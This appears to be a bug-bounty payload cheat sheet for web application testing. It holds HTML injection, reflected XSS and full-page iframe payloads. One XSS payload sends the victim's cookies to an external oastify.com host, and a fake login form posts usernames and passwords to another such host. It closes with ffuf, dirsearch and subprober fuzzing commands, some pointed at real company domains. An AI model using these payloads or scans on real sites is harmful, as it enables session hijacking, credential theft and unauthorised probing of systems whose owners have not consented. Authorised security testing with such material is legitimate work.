payload for testing HTML/XSS/IFRAME/ATO/PHISHING

HTMLi:
<font color="red">ERROR 1064 (42000): You have an error in your SQL syntax;

RXSS:
<img src/onerror=prompt(document.cookie)>

IFrame:
"><iframe src="https://www.cia.gov/" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">

ATO:
<img src=x  onerror="document.location='http://o0p70yehe4avf6728g095671asgj49sy.oastify.com?c='+document.cookie;" />

PHISHING:
<h3>Please login to proceed</h3> <form action=http://zgj49ubrlvka5wgrek9bc0eryi49s0io7.oastify.com>
Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br>
<input type="submit" value="Login"></br>

My preferred fuzzing method:

ffuf -w facundo.txt -u https://tesla.com/FUZZ -mc all -c -v \
-H "User-Agent: Mozilla/5.0" -H "Accept: */*" \
-X GET -r -t 100 -p 0.1-1.0 -maxtime 3600 -o results.json -of json -od results \
-mc 200,301,302,307,401,403,500 -ac -recursion -recursion-depth 2 -rate 50 \

dirsearch -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json  -u https://adminblog.abc.com/

subprober -f all.txt -tl -sc -sv -l -cn -ar -o output.txt -nc -mc 200 301 302 307 308 403 401 -c 20

